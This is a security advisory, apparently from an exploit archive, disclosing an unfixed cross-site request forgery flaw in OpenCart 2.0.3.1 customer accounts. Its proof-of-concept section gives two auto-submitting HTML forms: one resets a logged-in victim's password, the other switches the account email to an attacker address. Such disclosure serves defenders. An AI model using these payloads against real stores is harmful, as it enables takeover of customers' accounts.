OpenCart 2.0.3.1 Cross Site Request Forgery Vulnerability

2015-11-07T00:00:00
ID 1337DAY-ID-24514
Type zdt
Reporter Tim Coen
Modified 2015-11-07T00:00:00

Description

OpenCart version 2.0.3.1 suffers from a cross site request forgery vulnerability.

                                        
                                            1. Introduction

Affected Product:    OpenCart 2.0.3.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      https://www.opencart.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist for
customers. This means that customer accounts can be compromised by an attacker
if the victim visits an attacker controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions of
OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password" >
    <input type="hidden" name="password" value="12345">
    <input type="hidden" name="confirm" value="12345">
</form>
<script>document.myform.submit();</script>

Change profile information, including email address, which is used when logging
in:


<form name="myform" method="post" action="http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit" >
    <input type="hidden" name="currency" value="USD">
    <input type="hidden" name="language" value="en">
    <input type="hidden" name="firstname" value="Jane">
    <input type="hidden" name="lastname" value="Smith">
    <input type="hidden" name="email" value="attacker@evil.com">
    <input type="hidden" name="telephone" value="1234567">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

#  0day.today [2016-04-19]  #